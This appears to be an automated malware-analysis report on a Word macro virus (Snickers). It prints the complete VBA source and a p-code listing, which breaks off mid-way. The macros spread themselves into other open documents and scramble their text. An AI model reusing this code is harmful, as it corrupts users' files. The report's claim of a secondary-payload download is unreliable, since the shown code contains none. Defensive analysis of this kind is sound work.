Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 18c05c92a9e886fb…

MALICIOUS

Office (OLE)

29.5 KB Created: 2000-01-30 13:11:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 5461c1149a674832ac3e2085cf0668ea SHA-1: ad4d1a6c65d6bb2cfd64589f8db45d2a00dc3ab9 SHA-256: 18c05c92a9e886fbd5479c587902e11181b69d94ca47477256f63f02ab666814
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a legacy Word document containing VBA macros, specifically an AutoOpen macro that attempts to copy and execute other macros. The 'crypt' subroutine appears to obfuscate and deobfuscate strings within the document. The ClamAV detection as 'Doc.Trojan.Snickers-2' strongly suggests malicious intent, likely involving the download and execution of a secondary payload.

Heuristics 5

  • ClamAV: Doc.Trojan.Snickers-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Snickers-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4809 bytes
SHA-256: e45a7b4b873227d5bc9f9eaf4db00190fd3a167dd079cdc3452bb8d9410a970f
Detection
ClamAV: Doc.Trojan.Snickers-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "autoopen"

Public Sub MAIN()
Dim a$
Dim a_
Dim b$
WordBasic.ScreenUpdating
WordBasic.DisableAutoMacros
a$ = WordBasic.[FileName$]()
For a_ = 1 To WordBasic.CountFiles()
If WordBasic.[Files$](WordBasic.[FileName$](a_)) <> "" Then
WordBasic.FileList a_
b$ = WordBasic.[FileName$]()
If a$ <> b$ Then
If WordBasic.[GetDocumentVar$]("snickers") = "" Then
WordBasic.MacroCopy a$ + ":autoopen", b$ + ":"
WordBasic.MacroCopy a$ + ":autoclose", b$ + ":"
crypt
WordBasic.SetDocumentVar "snickers", "mmmhh"
WordBasic.FileSaveAs Format:=1
End If
WordBasic.FileClose
End If
End If
Next
crypt
WordBasic.DisableAutoMacros 0
End Sub
Private Sub crypt()
Dim a$
Dim a_
Dim b$
WordBasic.EditSelectAll
a$ = WordBasic.[Selection$]()
On Error Resume Next
For a_ = 1 To Len(a$) Step 2
b$ = b$ + Mid(a$, a_ + 1, 1)
b$ = b$ + Mid(a$, a_, 1)
Next
WordBasic.Insert b$
WordBasic.WW6_EditClear -1
WordBasic.StartOfDocument
End Sub

Attribute VB_Name = "autoclose"

Public Sub MAIN()
WordBasic.ScreenUpdating
WordBasic.Call "autoopen.crypt"
WordBasic.FileSave
End Sub

' Processing file: /opt/analyzer/scan_staging/c6b3c0521acc4cdab338c9a005f644b0.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/autoopen - 2638 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Public Sub MAIN())
' Line #2:
' 	Dim 
' 	VarDefn a
' Line #3:
' 	Dim 
' 	VarDefn a_
' Line #4:
' 	Dim 
' 	VarDefn B
' Line #5:
' 	Ld WordBasic 
' 	ArgsMemCall ScreenUpdating 0x0000 
' Line #6:
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0000 
' Line #7:
' 	Ld WordBasic 
' 	ArgsMemLd [FileName$] 0x0000 
' 	St a$ 
' Line #8:
' 	StartForVariable 
' 	Ld a_ 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld WordBasic 
' 	ArgsMemLd CountFiles 0x0000 
' 	For 
' Line #9:
' 	Ld a_ 
' 	Ld WordBasic 
' 	ArgsMemLd [FileName$] 0x0001 
' 	Ld WordBasic 
' 	ArgsMemLd [Files$] 0x0001 
' 	LitStr 0x0000 ""
' 	Ne 
' 	IfBlock 
' Line #10:
' 	Ld a_ 
' 	Ld WordBasic 
' 	ArgsMemCall FileList 0x0001 
' Line #11:
' 	Ld WordBasic 
' 	ArgsMemLd [FileName$] 0x0000 
' 	St B$ 
' Line #12:
' 	Ld a$ 
' 	Ld B$ 
' 	Ne 
' 	IfBlock 
' Line #13:
' 	LitStr 0x0008 "snickers"
' 	Ld WordBasic 
' 	ArgsMemLd [GetDocumentVar$] 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #14:
' 	Ld a$ 
' 	LitStr 0x0009 ":autoopen"
' 	Add 
' 	Ld B$ 
' 	LitStr 0x0001 ":"
' 	Add 
' 	Ld WordBasic 
' 	ArgsMemCall MacroCopy 0x0002 
' Line #15:
' 	Ld a$ 
' 	LitStr 0x000A ":autoclose"
' 	Add 
' 	Ld B$ 
' 	LitStr 0x0001 ":"
' 	Add 
' 	Ld WordBasic 
' 	ArgsMemCall MacroCopy 0x0002 
' Line #16:
' 	ArgsCall crypt 0x0000 
' Line #17:
' 	LitStr 0x0008 "snickers"
' 	LitStr 0x0005 "mmmhh"
' 	Ld WordBasic 
' 	ArgsMemCall SetDocumentVar 0x0002 
' Line #18:
' 	LitDI2 0x0001 
' 	ParamNamed Format$ 
' 	Ld WordBasic 
' 	ArgsMemCall FileSaveAs 0x0001 
' Line #19:
' 	EndIfBlock 
' Line #20:
' 	Ld WordBasic 
' 	ArgsMemCall FileClose 0x0000 
' Line #21:
' 	EndIfBlock 
' Line #22:
' 	EndIfBlock 
' Line #23:
' 	StartForVariable 
' 	Next 
' Line #24:
' 	ArgsCall crypt 0x0000 
' Line #25:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #26:
' 	EndSub 
' Line #27:
' 	FuncDefn (Private Sub crypt())
' Line #28:
' 	Dim 
' 	VarDefn a
' Line #29:
' 	Dim 
' 	VarDefn a_
' Line #30:
' 	Dim 
' 	VarDefn B
' Line #31:
' 	Ld WordBasic 
' 	ArgsMemCall EditSelectAll 0x0000 
' Line #32:
' 	Ld WordBasic 
' 	ArgsMemLd [Selection$] 0x0000 
' 	St a$ 
' Line #33:
' 	OnError (Resume Next) 
' Line #34:
' 	StartForVariable 
' 	Ld a_ 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld a$ 
' 	FnLen 
' 	LitDI2 0x0002 
' 	ForStep 
' Line #35:
' 	Ld B$ 
' 	Ld a$ 
' 	Ld a_ 
' 	LitDI2 0x0001 
' 	Add 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	Add 
' 	St B$ 
' Line #36
... (truncated)